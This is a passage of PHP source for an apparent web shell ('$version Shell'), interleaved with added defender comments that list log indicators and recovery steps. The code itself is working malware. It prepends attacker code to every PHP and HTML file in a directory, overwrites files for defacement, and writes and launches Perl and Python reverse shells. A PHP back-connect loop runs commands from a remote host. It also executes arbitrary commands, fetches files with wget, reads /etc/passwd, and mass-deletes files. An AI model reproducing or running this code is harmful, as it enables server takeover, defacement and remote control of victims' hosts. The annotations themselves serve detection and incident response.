  706. echo 'md5($pass.$salt) (Joomla): '.$joomlahash.':'.$joomlasalt."\n";
  707. echo 'md5($salt.$pass) (osCommerce): '.$oscommhash.':'.$oscommsalt."\n";
  708. echo 'md5(md5($pass).$salt) (vBulletin < 3.8.5): '.$vbhash.':'.$vbsalt."\n";
  709. echo 'md5(md5($pass).$salt) (vBulletin >= 3.8.5): '.$vbhash2.':'.$vbsalt2."\n";
  710. echo 'md5(md5($salt).$pass) (MyBB < 1.2): '.$mybbhash2.':'.$mybbsalt2."\n";
  711. echo 'md5(md5($salt).md5($pass)) (MyBB 1.2+): '.$mybbhash.':'.$mybbsalt."\n";
  712. echo 'md5(md5($salt).md5($pass)) (IPB 2+): '.$ipbhash.':'.$ipbsalt."\n";
  713. echo "</textarea>
  714. </center>";
  715. }
  716.  
  717. //Extract Files
  // Passes the `extract`, `epath` and `type` query parameters to extract_file() unchanged:
  // archive path, destination directory and archive type are all request-controlled.
  718. if(isset($_GET['extract'])) {
  719. $file = $_GET['extract'];
  720. $epath = $_GET['epath'];
  721. $type = $_GET['type'];
  722. extract_file($file, $epath, $type);
  723. }
  724.  
  725. //Infect Files
  // DEFENDER NOTE: mass file modification. For every file mass_files() returns under the
  // posted directory whose extension matches the chosen type (php, html or both), the
  // posted text is written in front of the existing content with file_put_contents().
  // Nothing restricts the directory to the web root; the form only pre-fills it with it.
  // Incident response: if this script is found on a host, compare every .php and .html
  // file writable by the web-server account against version control or a known-good
  // backup. Modified files will share an identical leading block and will typically show
  // closely clustered modification times. Restore from clean source rather than editing
  // files by hand, and alert on bulk writes to source files by the web-server account.
  726. if(isset($_POST['do_infect'])) {
  727. $infdir = rtrim($_POST['infect_dir'], '/');
  728. $type = $_POST['infect_type'];
  729. $infcode = $_POST['infect_code'];
  730. if(is_dir($infdir)) {
  731. $success = 0;
  732. $failed = 0;
  733. foreach(mass_files($infdir, false) as $key => $files) {
  734. $exten = pathinfo($files, PATHINFO_EXTENSION);
  735. if($type == 'php') {
  736. if($exten == 'php') {
  737. $content = $infcode;
  738. $content .= file_get_contents($files);
  739. if(file_put_contents($files, $content)) {
  740. echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
  741. $success++;
  742. } else {
  743. echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
  744. $failed++;
  745. }
  746. }
  747. } elseif($type == 'html') {
  748. if($exten == 'html') {
  749. $content = $infcode;
  750. $content .= file_get_contents($files);
  751. if(file_put_contents($files, $content)) {
  752. echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
  753. $success++;
  754. } else {
  755. echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
  756. $failed++;
  757. }
  758. }
  759. } elseif($type == 'both') {
  760. if($exten == 'html' or $exten == 'php') {
  761. $content = $infcode;
  762. $content .= file_get_contents($files);
  763. if(file_put_contents($files, $content)) {
  764. echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
  765. $success++;
  766. } else {
  767. echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
  768. $failed++;
  769. }
  770. }
  771. }
  772. }
  773. echo "A total of $success files were infected!<br>A total of $failed files failed to be infected!";
  774. } else {
  775. error("$infdir is not a valid directory!");
  776. }
  777. }
  778. if(isset($_GET['fileInfect'])) {
  779. echo "<center>
  780. This will append your infect code to the top of every file in the given directory.<br>
  781. <form action='' method='post'>
  782. Directory to infect: <input type='text' name='infect_dir' value='$rootdir'>
  783. File types to infect:
  784. <select name='infect_type'>
  785. <option value='php'>PHP</option>
  786. <option value='html'>HTML</option>
  787. <option value='both'>Both</option>
  788. </select><br>
  789. Code to infect files with:<br>
  790. <textarea name='infect_code' cols='110' rows='20'></textarea><br>
  791. <input type='submit' name='do_infect' value='Infect'>
  792. </form>
  793. </center>";
  794. }
  795.  
  796. //Deface Files
  // DEFENDER NOTE: mass file overwrite. Same walk and extension filter as the infect
  // handler, but the whole content of each matching file is replaced with the posted text;
  // only a path equal to __FILE__ (this script) is skipped.
  // Incident response: the original content is not kept anywhere by this code, so recovery
  // means restoring from backup or redeploying from source control. File-integrity
  // monitoring on the web root, and offline or versioned backups that the web-server
  // account cannot modify, are the controls that bound the damage.
  797. if(isset($_POST['do_deface'])) {
  798. $defdir = rtrim($_POST['deface_dir'], '/');
  799. $type = $_POST['deface_type'];
  800. $defsource = $_POST['deface_source'];
  801. if(is_dir($defdir)) {
  802. $success = 0;
  803. $failed = 0;
  804. foreach(mass_files($defdir, false) as $key => $files) {
  805. $exten = pathinfo($files, PATHINFO_EXTENSION);
  806. if($type == 'php') {
  807. if($exten == 'php') {
  808. if($files != __FILE__) {
  809. if(file_put_contents($files, $defsource)) {
  810. echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
  811. $success++;
  812. } else {
  813. echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
  814. $failed++;
  815. }
  816. }
  817. }
  818. } elseif($type == 'html') {
  819. if($exten == 'html') {
  820. if($files != __FILE__) {
  821. if(file_put_contents($files, $defsource)) {
  822. echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
  823. $success++;
  824. } else {
  825. echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
  826. $failed++;
  827. }
  828. }
  829. }
  830. } elseif($type == 'both') {
  831. if($exten == 'html' or $exten == 'php') {
  832. if($files != __FILE__) {
  833. if(file_put_contents($files, $defsource)) {
  834. echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
  835. $success++;
  836. } else {
  837. echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
  838. $failed++;
  839. }
  840. }
  841. }
  842. }
  843. }
  844. echo "A total of $success files were defaced!<br>A total of $failed files failed to be defaced!";
  845. } else {
  846. error("$defdir is not a valid directory!");
  847. }
  848. }
  849. if(isset($_GET['fileDeface'])) {
  850. echo "<center>
  851. This will deface every file in the given directory. This will not deface this shell.<br>
  852. <form action='' method='post'>
  853. Directory to deface: <input type='text' name='deface_dir' value='$rootdir'>
  854. File types to deface:
  855. <select name='deface_type'>
  856. <option value='php'>PHP</option>
  857. <option value='html'>HTML</option>
  858. <option value='both'>Both</option>
  859. </select><br>
  860. Source to deface files with:<br>
  861. <textarea name='deface_source' cols='110' rows='20'></textarea><br>
  862. <input type='submit' name='do_deface' value='Deface'>
  863. </form>
  864. </center>";
  865. }
  866.  
  867. //Back Connect
  868. if(isset($_POST['bcpl_connect'])) {
  869. $ip = $_POST['bcpl_ip'];
  870. $port = $_POST['bcpl_port'];
  871. if(can_exe()) {
  872. if(file_exists("/tmp/bc.pl")) {
  873. echo "<center>
  874. Trying to connect to $ip on port $port<br>
  875. The response from 'perl /tmp/bc.pl $ip $port' was:<br>
  876. <textarea cols='120' rows='25'>".exe_cmd("perl /tmp/bc.pl $ip $port")."</textarea>
  877. </center>";
  878. } else {
  879. error("/tmp/bc.pl does not exist!");
  880. }
  881. } else {
  882. error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
  883. }
  884. }
  885. if(isset($_GET['bcPerl'])) {
  886. if(can_exe()) {
  887. if(is_dir('/tmp')) {
  888. if(file_put_contents('/tmp/bc.pl', base64_decode($bcpl))) {
  889. success("Successfully wrote /tmp/bc.pl!");
  890. echo "<center>
  891. <form action='' method='post'>
  892. IP: <input type='text' name='bcpl_ip' value='$yourip'>
  893. Port: <input type='text' name='bcpl_port' value='2121' size='3'>
  894. <input type='submit' name='bcpl_connect' value='Connect'><br>
  895. Use: 'nc -l -v -p PORT' Remember your port must be forwarded!
  896. </form>
  897. </center>";
  898. } else {
  899. error("Failed to write Perl source to /tmp/bc.pl!");
  900. }
  901. } else {
  902. error('/tmp is not a directory!');
  903. }
  904. } else {
  905. error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
  906. }
  907. }
  908.  
  // Python back-connect, run step. Fires on POST field 'bcpy_connect'. The posted
  // 'bcpy_ip' and 'bcpy_port' values are interpolated, unquoted and unvalidated,
  // into the "python /tmp/bc.py ..." command string passed to exe_cmd() (defined
  // outside this excerpt), and the command output is echoed into the page.
  // Defender notes: indicators are POST fields named bcpy_*, the file /tmp/bc.py,
  // and a python process started from the web server's PHP context.
  909. if(isset($_POST['bcpy_connect'])) {
  910. $ip = $_POST['bcpy_ip'];
  911. $port = $_POST['bcpy_port'];
  912. if(can_exe()) {
  913. if(file_exists("/tmp/bc.py")) {
  914. echo "<center>
  915. Trying to connect to $ip on port $port<br>
  916. The response from 'python /tmp/bc.py $ip $port' was:<br>
  917. <textarea cols='120' rows='25'>".exe_cmd("python /tmp/bc.py $ip $port")."</textarea>
  918. </center>";
  919. } else {
  920. error("/tmp/bc.py does not exist!");
  921. }
  922. } else {
  923. error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
  924. }
  925. }
  // Python back-connect, staging step. Fires on GET parameter 'bcPython'. Decodes
  // the base64 blob held in $bcpy (defined outside this excerpt), writes it to
  // /tmp/bc.py and prints a form whose submit field is 'bcpy_connect'.
  // Forensic note: the path written is /tmp/bc.py, but both status messages print
  // "/tmp/by.py". Search the file system for bc.py and response bodies for by.py.
  926. if(isset($_GET['bcPython'])) {
  927. if(can_exe()) {
  928. if(is_dir("/tmp")) {
  929. if(file_put_contents('/tmp/bc.py', base64_decode($bcpy))) {
  930. success("Successfully wrote /tmp/by.py");
  931. echo "<center>
  932. <form action='' method='post'>
  933. IP: <input type='text' name='bcpy_ip' value='$yourip'>
  934. Port: <input type='text' name='bcpy_port' value='2121' size='3'>
  935. <input type='submit' name='bcpy_connect' value='Connect'><br>
  936. Use 'nc -l -v -p PORT' Remember your port must be forwarded!
  937. </form>
  938. </center>";
  939. } else {
  940. error("Failed to write Python source to /tmp/by.py");
  941. }
  942. } else {
  943. error("/tmp is not a directory!");
  944. }
  945. } else {
  946. error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
  947. }
  948. }
  949.  
  // PHP back-connect. Fires on POST field 'bcphp_connect'. Opens a socket from the
  // server to the posted 'bcphp_ip' / 'bcphp_port' with fsockopen(), sends the
  // banner "[+]PHP Back Connection[+]" followed by the output of `uname -a` and
  // `id`, then loops until EOF: writes a "> " prompt, reads one line from the
  // socket, passes it to exe_cmd() (defined outside this excerpt) and writes the
  // result back. This handler does not call can_exe() before doing so.
  // Defender notes: the banner string is a usable network signature where the
  // traffic can be inspected. The HTTP request stays open for the whole session,
  // so a long-running PHP request holding an outbound socket is a host-side
  // indicator. Default-deny egress from web servers closes this path.
  950. if(isset($_POST['bcphp_connect'])) {
  951. $ip = $_POST['bcphp_ip'];
  952. $port = $_POST['bcphp_port'];
  953. echo "<center>Trying to connect!</center>";
  954. $sockopen = fsockopen($ip , $port , $errno, $errstr);
  955. if(!$sockopen) {
  956. error("Failed to open socket!");
  957. } elseif($errno != 0) {
  958. error("$errno: $errstr");
  959. } else {
  960. fputs($sockopen, "\n[+]PHP Back Connection[+]\n\n");
  961. $uname = exe_cmd("uname -a");
  962. $id = exe_cmd("id");
  963. fputs($sockopen, "$uname$id\n");
  964. while(!feof($sockopen)) {
  965. fputs($sockopen, "> ");
  966. $command = fgets($sockopen);
  967. fputs($sockopen , exe_cmd($command));
  968. }
  969. fclose($sockopen);
  970. }
  971. }
  // Form for the PHP back-connect. Fires on GET parameter 'bcPHP' and, when
  // can_exe() (defined outside this excerpt) returns true, prints a POST form with
  // fields 'bcphp_ip' (pre-filled with $yourip), 'bcphp_port' (pre-filled with
  // 2121) and the submit field 'bcphp_connect'.
  // Defender note: the GET key 'bcPHP' and the bcphp_* field names are log
  // indicators for this shell.
  972. if(isset($_GET['bcPHP'])) {
  973. if(can_exe()) {
  974. echo "<center>
  975. <form action='' method='post'>
  976. IP: <input type='text' name='bcphp_ip' value='$yourip'>
  977. Port: <input type='text' name='bcphp_port' value='2121' size='3'>
  978. <input type='submit' name='bcphp_connect' value='Connect'><br>
  979. Use 'nc -l -v -p PORT' Remember your port must be forwarded!
  980. </form>
  981. </center>";
  982. } else {
  983. error("Can not execute commands! Commands need to be executed for this reverse shell to work!");
  984. }
  985. }
  986.  
  987. //System
  // Account enumeration. Fires on GET parameter 'users'. Reads /etc/passwd,
  // splits it on newlines and then on ':' and prints every field as a table cell
  // without HTML escaping.
  // Defender note: a request carrying '?users' followed by a response containing
  // passwd-style rows indicates local account discovery through this shell.
  988. if(isset($_GET['users'])) {
  989. if(file_exists('/etc/passwd')) {
  990. $getfile = file_get_contents('/etc/passwd');
  991. $exline = explode("\n", $getfile);
  992. echo "<table>
  993. <tr>
  994. <th>Username</th>
  995. <th>Password?</th>
  996. <th>UID</th>
  997. <th>GID</th>
  998. <th>UID Info</th>
  999. <th>Home Directory</th>
  1000. <th>Command/Shell</th>
  1001. </tr>";
  1002. foreach($exline as $exl) {
  1003. echo "<tr>";
  1004. $excol = explode(":", $exl);
  1005. foreach($excol as $exc) {
  1006. echo "<td>$exc</td>";
  1007. }
  1008. echo "</tr>";
  1009. }
  1010. echo "</table>";
  1011. } else {
  1012. error("/etc/passwd does not exist!");
  1013. }
  1014. }
  1015.  
  // Process listing. Fires on GET parameter 'processes'. Runs `ps aux` through
  // exe_cmd() (defined outside this excerpt), drops the first (header) line,
  // splits each remaining line on spaces and prints it as a table row. When a
  // line has more than 11 fields, the first 10 become cells and the rest are
  // re-joined into the COMMAND cell. Each row gets a link whose query key is
  // 'killProccess' (spelled as in the source) carrying the second field, the PID.
  // Defender note: `ps aux` spawned from the web server's PHP context, and
  // requests with '?processes' or '?killProccess=', are indicators of process
  // discovery through this shell.
  1016. if(isset($_GET['processes'])) {
  1017. if(can_exe()) {
  1018. $processes = exe_cmd("ps aux");
  1019. $stripfirstline = substr($processes, strpos($processes, "\n")+1);
  1020. $exline = explode("\n", $stripfirstline);
  1021. echo "<div id='hover'>
  1022. <table width='100%' border='1'>
  1023. <tr>
  1024. <th>Kill</th>
  1025. <th>USER</th>
  1026. <th>PID</th>
  1027. <th>%CPU</th>
  1028. <th>%MEM</th>
  1029. <th>VSZ</th>
  1030. <th>RSS</th>
  1031. <th>TTY</th>
  1032. <th>STAT</th>
  1033. <th>START</th>
  1034. <th>TIME</th>
  1035. <th>COMMAND</th>
  1036. </tr>";
  1037. foreach($exline as $exl) {
  1038. echo "<tr>";
  1039. $exsp = array_values(array_filter(explode(" ", $exl), 'strlen'));
  1040. if(count($exsp) > 11) {
  1041. $slice = array_slice($exsp, 0, 10);
  1042. echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
  1043. foreach($slice as $s) {
  1044. echo "<td>$s</td>";
  1045. }
  1046. $slice2 = array_slice($exsp, 10);
  1047. echo "<td>".implode(" ", $slice2)."</td>";
  1048. } else {
  1049. echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
  1050. foreach($exsp as $e) {
  1051. echo "<td>$e</td>";
  1052. }
  1053. }
  1054. echo "</tr>";
  1055. }
  1056. echo "</table></div>";
  1057. } else {
  1058. error("Can not execute commands! Must execute 'ps aux' to get processes.");
  1059. }
  1060. }
  1061.  
  // Memory and disk report. Fires on GET parameter 'memory'. Prints the raw
  // contents of /proc/meminfo, then total, free and used space and the rounded
  // percentage used for the "/" file system. ByteConversion() is defined outside
  // this excerpt (presumably formats a byte count for display).
  // Defender note: host reconnaissance only; nothing is written here.
  1062. if(isset($_GET['memory'])) {
  1063. if(file_exists('/proc/meminfo')) {
  1064. $raminfo = file_get_contents('/proc/meminfo');
  1065. echo "Ram:<br><pre>$raminfo</pre><br><br>";
  1066. } else {
  1067. error("/proc/meminfo does not exist!");
  1068. }
  1069. $hddfree = disk_free_space("/");
  1070. $hddtotal = disk_total_space("/");
  1071. $hddused = $hddtotal - $hddfree;
  1072. $hddpercent = round(($hddused / $hddtotal) * 100);
  1073. echo "HDD:<br>Total Space: ".ByteConversion($hddtotal)."<br>Free Space: ".ByteConversion($hddfree)."<br>Used Space: ".ByteConversion($hddused)."<br>Percent Used: ~$hddpercent%";
  1074. }
  1075.  
  // CPU report. Fires on GET parameter 'cpu' and prints the raw contents of
  // /proc/cpuinfo inside a textarea. Host reconnaissance only; nothing is written.
  1076. if(isset($_GET['cpu'])) {
  1077. if(file_exists('/proc/cpuinfo')) {
  1078. $cpuinfo = file_get_contents('/proc/cpuinfo');
  1079. echo "<center>
  1080. CPU Information:<br>
  1081. <textarea cols='120' rows='20'>$cpuinfo</textarea>
  1082. </center>";
  1083. } else {
  1084. error('/proc/cpuinfo does not exist!');
  1085. }
  1086. }
  1087.  
  1088. //Execute Command
  // Arbitrary command execution, the core capability of this shell. Fires on
  // POST field 'exe_cmd'. The posted 'command' string is passed unchanged to
  // exe_cmd() (defined outside this excerpt) and both the command and its output
  // are echoed into the page without HTML escaping.
  // Defender notes: POST bodies carrying both 'command' and 'exe_cmd' are a log
  // or WAF indicator. On the host, look for shell child processes of the web
  // server's PHP worker. Restricting PHP's process-execution functions with
  // disable_functions limits this handler.
  1089. if(isset($_POST['exe_cmd'])) {
  1090. $command = $_POST['command'];
  1091. if(can_exe()) {
  1092. echo "<center>
  1093. <form action='' method='post'>
  1094. <input type='text' name='command' size='75'>
  1095. <input type='submit' name='exe_cmd'>
  1096. </form>
  1097. The response from '$command' was:<br>
  1098. <textarea cols='100' rows='20'>".exe_cmd($command)."</textarea>
  1099. </center>";
  1100. } else {
  1101. error("Can not execute commands!");
  1102. }
  1103. }
  1104.  
  1105. //Create File
  // Fires on POST field 'create_file'. Creates an empty file at the posted
  // 'create_file_path' (any path the PHP process may write to) by opening it with
  // mode "w+", then calls redirect() (defined outside this excerpt) with the
  // '?edit=' URL for that path.
  // Defender note: new files created by the web-server account outside the
  // application's expected upload locations are a file-integrity indicator.
  1106. if(isset($_POST['create_file'])) {
  1107. $createpath = $_POST['create_file_path'];
  1108. if(!file_exists($createpath)) {
  1109. if(fopen($createpath, "w+")) {
  1110. redirect("?edit=$createpath");
  1111. } else {
  1112. error("Failed to create file!");
  1113. }
  1114. } else {
  1115. error("File already exists! You can view it <a href='?edit=$createpath'>here</a>.");
  1116. }
  1117. }
  1118. //Create Directory
  // Fires on POST field 'create_dir'. Creates the posted 'create_dir_path' with
  // mode 0777 requested (the effective mode still depends on the process umask),
  // then calls redirect() (defined outside this excerpt) with the '?dir=' URL.
  // Defender note: directories created by the web-server account with
  // world-writable permissions are worth alerting on.
  1119. if(isset($_POST['create_dir'])) {
  1120. $dirpath = $_POST['create_dir_path'];
  1121. if(!is_dir($dirpath)) {
  1122. if(mkdir($dirpath, 0777)) {
  1123. redirect("?dir=$dirpath");
  1124. } else {
  1125. error("Failed to make directory!");
  1126. }
  1127. } else {
  1128. error("This directory already exists! You can view it <a href='?dir=$dirpath'>here</a>.");
  1129. }
  1130. }
  1131.  
  1132. //Wget File
  // Remote file retrieval. Fires on POST field 'do_wget'. The posted 'wget_file'
  // value is interpolated, unquoted and unvalidated, into a "wget ..." command
  // string passed to exe_cmd() (defined outside this excerpt), and the command
  // output is echoed into the page.
  // Defender notes: wget started from the web server's PHP context, and outbound
  // HTTP from a host that normally only serves requests, are indicators of
  // tooling being pulled onto the server. Default-deny egress blocks this.
  1133. if(isset($_POST['do_wget'])) {
  1134. $fileurl = $_POST['wget_file'];
  1135. if(can_exe()) {
  1136. echo "<center>
  1137. The response from 'wget $fileurl' was:<br>
  1138. <textarea cols='120' rows='20'>".exe_cmd("wget $fileurl")."</textarea>
  1139. </center>";
  1140. } else {
  1141. error("Commands can not be executed!");
  1142. }
  1143. }
  1144.  
  1145. //Upload File
  // Fires on POST field 'do_upload'. Moves the uploaded file into the posted
  // 'upload_dir', keeping the client-supplied file name; neither the directory
  // nor the name is validated, and no type or extension check is made.
  // redirect() and error() are defined outside this excerpt.
  // Defender note: multipart POSTs to this script with the fields 'upload_dir'
  // and 'upload_file', followed by new files owned by the web-server account,
  // indicate file staging through this shell.
  1146. if(isset($_POST['do_upload'])) {
  1147. $uploaddir = $_POST['upload_dir'];
  1148. $uploadname = $_FILES['upload_file']['name'];
  1149. if(!file_exists("$uploaddir/$uploadname")) {
  1150. if(move_uploaded_file($_FILES['upload_file']['tmp_name'], "$uploaddir/$uploadname")) {
  1151. redirect("?dir=$uploaddir");
  1152. } else {
  1153. error("Failed to upload file!");
  1154. }
  1155. } else {
  1156. error("File already exists! You can view it <a href='?edit=$uploaddir$uploadname'>here</a>.");
  1157. }
  1158. }
  1159.  
  1160. //Mass Files
  // Bulk file operations. Fires on POST field 'mass_action'. 'action' selects
  // 'delete' or 'chmod' and 'massbox' is the posted list of paths. For 'delete',
  // directories go to rmdir() and everything else to unlink(). For 'chmod', each
  // path is passed to chmod() together with the posted 'chmod_value'. Every path
  // and result is echoed into the page without HTML escaping.
  // Defender note: bursts of deletions or permission changes made by the
  // web-server account, preceded by a POST with 'massbox[]' entries, are the
  // trace this handler leaves. File-integrity monitoring and off-host log
  // shipping preserve evidence that this handler can remove.
  1161. if(isset($_POST['mass_action'])) {
  1162. $action = $_POST['action'];
  1163. $checked = $_POST['massbox'];
  1164. if($action == 'delete') {
  1165. foreach($checked as $c) {
  1166. if(is_dir($c)) {
  1167. if(rmdir($c)) {
  1168. echo "<font color='green'><b>Successfully deleted directory: $c</font><br>";
  1169. } else {
  1170. echo "<font color='red'><b>Failed to delete directory: $c</font><br>";
  1171. }
  1172. } else {
  1173. if(unlink($c)) {
  1174. echo "<font color='green'><b>Successfully deleted file: $c</font><br>";
  1175. } else {
  1176. echo "<font color='red'><b>Failed to delete file: $c</font><br>";
  1177. }
  1178. }
  1179. }
  1180. } elseif($action == 'chmod') {
  1181. $chvalue = $_POST['chmod_value'];
  1182. foreach($checked as $c) {
  1183. if(chmod($c, $chvalue)) {
  1184. echo "<font color='red'><b>Successfully chmod'd file: $c to: $chvalue</font><br>";
  1185. } else {
  1186. echo "<font color='red'><b>Failed to chmod file: $c to: $chvalue</font><br>";
  1187. }
  1188. }
  1189. } else {
  1190. error('Invalid action specified!');
  1191. }
  1192. }
  1193.  
  1194. //Display Disabled Functions
  // Fires on GET parameter 'disabledFunctions'. Splits $disabledfunc (defined
  // outside this excerpt; presumably the disable_functions ini value) on commas
  // and prints one entry per line.
  // Defender note: this reports the PHP hardening in place on the host back to
  // the operator of the shell.
  1195. if(isset($_GET['disabledFunctions'])) {
  1196. echo "Disabled functions:<br>";
  1197. $ex = explode(",", $disabledfunc);
  1198. foreach($ex as $e) {
  1199. echo "$e<br>";
  1200. }
  1201. }
  1202.  
  1203. //Kill Process
  // Fires on GET parameter 'killProcess'. Passes the supplied value to
  // posix_kill() and reports the result through success() or error() (both
  // defined outside this excerpt). The value is not validated and is echoed
  // into the status message.
  // Defender note: requests carrying '?killProcess=' are a log indicator.
  1204. if(isset($_GET['killProcess'])) {
  1205. $id = $_GET['killProcess'];
  1206. if(posix_kill($id)) {
  1207. success("Successfully killed process: $id");
  1208. } else {
  1209. error("Failed to kill process: $id");
  1210. }
  1211. }
  1212.  
  1213. //Check Links
  // Fires on GET parameter 'checkLinks'. Iterates $links (defined outside this
  // excerpt), where each entry carries 'LINK', 'MD5' and 'DESC'. For every entry
  // the server requests the URL's headers with get_headers(), derives the Status
  // cell from the first header line, and compares md5_file() of the URL with the
  // stored hash.
  // Defender note: each visit makes the compromised server issue outbound
  // requests to every listed URL, so those destinations appear in proxy and DNS
  // logs with the web server as the source.
  1214. if(isset($_GET['checkLinks'])) {
  1215. echo "<table border='1'>
  1216. <tr>
  1217. <th>Link</th>
  1218. <th>Status</th>
  1219. <th>MD5</th>
  1220. <th>Description</td>
  1221. </tr>";
  1222. foreach($links as $key => $ar) {
  1223. $link = $ar['LINK'];
  1224. $md5 = $ar['MD5'];
  1225. $desc = $ar['DESC'];
  1226. $headers = @get_headers($link);
  1227. echo "<tr>";
  1228. echo "<td><a href='$link'>$link</a></td>";
  1229. if($headers[0] != "HTTP/1.1 403 FORBIDDEN" or $headers[0] != "HTTP/1.1 404 Not Found") {
  1230. echo "<td><font color='green'><b>OK</b></font></td>";
  1231. } else {
  1232. echo "<td><font color='red'><b>Not Found</b></font></td>";
  1233. }
  1234. if(md5_file($link) == $md5) {
  1235. echo "<td><font color='green'><b>Match</b></font></td>";
  1236. } else {
  1237. echo "<td><font color='red'><b>No Match</b></font></td>";
  1238. }
  1239. echo "<td>$desc</td>";
  1240. echo "</tr>";
  1241. }
  1242. echo "</table>";
  1243. }
  1244.  
  1245. //Credits
  // Fires on GET parameter 'credits' and prints a static attribution panel.
  // Defender note: the literal strings in this panel and the "$version Shell"
  // heading are stable content signatures for this family when scanning web
  // roots or response bodies.
  1246. if(isset($_GET['credits'])) {
  1247. echo "<center>
  1248. <div id='container'>
  1249. <div id='content'>
  1250. <font size='6'><b>$version Shell</font></b><br>
  1251. Developed By: T3CH (@t3chfl4r3 or t3chfl4r3@gmail)<br>
  1252. Nav Bar: Bootstrap (<a href='http://getbootstrap.com/'>http://getbootstrap.com/</a>)<br>
  1253. Perl Reverse Shell: pentestmonkey@pentestmonkey.net<br>
  1254. Python Reverse Shell: Xavier Garcia (<a href='http://www.shellguardians.com'>http://www.shellguardians.com</a>)
  1255. </div>
  1256. </div>
  1257. </center>";
  1258. }
  1259.  
  1260. //Kill
  // Self-removal. Fires on GET parameter 'kill' and deletes this script from
  // disk with unlink(__FILE__).
  // Forensic note: the absence of the file does not mean the host was never
  // compromised. A final request with '?kill' in the access log marks the
  // removal, and files staged elsewhere (for example /tmp/bc.pl and /tmp/bc.py)
  // are not cleaned up by this handler.
  1261. if(isset($_GET['kill'])) {
  1262. if(unlink(__FILE__)) {
  1263. success("Successfully killed shell!");
  1264. } else {
  1265. error("Failed to kill shell!");
  1266. }
  1267. }
  1268.  
  1269. //Get Files & Directories from Current Directory
  // Runs on every request, not behind a parameter check. Opens $dir (defined
  // outside this excerpt; presumably taken from the 'dir' request parameter),
  // skips "." and "..", and sorts the remaining entries into $direcs and $files,
  // each ordered with asort(). The directory handle is not closed in this block.
  1270. $open = opendir($dir);
  1271. $files = array();
  1272. $direcs = array();
  1273. while ($file = readdir($open)) {
  1274. if ($file != "." && $file != "..") {
  1275. if (is_dir("$dir/$file")) {
  1276. array_push($direcs, $file);
  1277. } else {
  1278. array_push($files, $file);
  1279. }
  1280. }
  1281. }
  1282. asort($direcs);
  1283. asort($files);
  1284.  
  1285. //Display Files and Directories
  // Prints the "Current Directory" breadcrumb and the header row of the file
  // table. $dir is split on "/" and each path segment becomes a '?dir=' link to
  // the cumulative path so far. The '@' on $linkpath suppresses the notice for
  // appending to a variable that is not initialised in this block. No segment
  // is HTML-escaped.
  // Defender note: sequences of '?dir=<absolute path>' requests in access logs
  // show which directories were browsed through the shell.
  1286. echo <<<html
  1287. <br><br>
  1288. <table width='100%' border='1'>
  1289. <tr>
  1290. <th>Current Directory:
  1291. html;
  1292. $ex = explode("/", $dir);
  1293. for ($p = 0; $p < count($ex); $p++) {
  1294. @$linkpath.=$ex[$p] . '/';
  1295. $linkpath2 = rtrim($linkpath, "/");
  1296. echo "<a href='?dir=$linkpath2'>$ex[$p]</a>/";
  1297. }
  1298. echo <<<html
  1299. </th>
  1300. </tr>
  1301. </table>
  1302.  
  1303. <form action='' method='post'>
  1304. <div id="hover">
  1305. <table width='100%' border='1'>
  1306. <tr>
  1307. <th>File/Dir Name</th>
  1308. <th>Permissions</th>
  1309. <th>Writeable</th>
  1310. <th>Owner/Group</th>
  1311. <th>Size</th>
  1312. <th>Last Modified</th>
  1313. <th>Delete</th>
  1314. <th>Rename</th>
  1315. <th>Mass</th>
  1316. </tr>
  1317. html;
  1318. //Display Directories
  // One table row per sub-directory of $dir: octal permissions (fileperms()
  // converted to base 8 with the first two digits dropped), a writeable flag,
  // numeric owner and group IDs, and the last-modified time. Each row links to
  // '?dir=', '?delD=' and '?rename=...&rdir=' (handlers outside this excerpt)
  // and carries a 'massbox[]' checkbox for the bulk-action form. Names are
  // interpolated without HTML escaping.
  // Defender note: the GET keys dir, delD, rename and rdir are log indicators.
  1319. foreach($direcs as $dirs) {
  1320. $perms = substr(base_convert(fileperms("$dir/$dirs"), 10, 8), 2);
  1321. $writeable = is_writeable("$dir/$dirs") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
  1322. $owner = fileowner("$dir/$dirs");
  1323. $group = filegroup("$dir/$dirs");
  1324. $size = "Directory";
  1325. $lastmod = date("F d Y g:i:s", filemtime("$dir/$dirs"));
  1326. echo <<<html
  1327. <tr>
  1328. <td><a href='?dir=$dir/$dirs'>$dirs</a></td>
  1329. <td style="text-align: center;">$perms</td>
  1330. <td style="text-align: center;">$writeable</td>
  1331. <td style="text-align: center;">$owner/$group</td>
  1332. <td>$size</td>
  1333. <td>$lastmod</td>
  1334. <td><a href='?delD=$dir/$dirs'>Delete</a></td>
  1335. <td><a href='?rename=$dirs&rdir=$dir'>Rename</a></td>
  1336. <td><input type='checkbox' name='massbox[]' value='$dir/$dirs'></td>
  1337. </tr>
  1338. html;
  1339. }
  1340.  
  1341. //Display Files
  // One table row per file in $dir, with the same columns as the directory rows
  // plus a size formatted by ByteConversion() (defined outside this excerpt).
  // When the file extension is listed in $compression (defined outside this
  // excerpt) the name links to '?extract=...&epath=...&type=...'; otherwise it
  // links to '?edit='. Rows also link to '?delF=' and '?rename=...&rdir='; the
  // handlers for all of these are outside this excerpt. Names are interpolated
  // without HTML escaping.
  // Defender note: the GET keys edit, extract, epath, delF and rename are log
  // indicators of files being read, unpacked, deleted or renamed via the shell.
  1342. foreach($files as $file) {
  1343. $perms = substr(base_convert(fileperms("$dir/$file"), 10, 8), 2);
  1344. $writeable = is_writeable("$dir/$file") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
  1345. $owner = fileowner("$dir/$file");
  1346. $group = filegroup("$dir/$file");
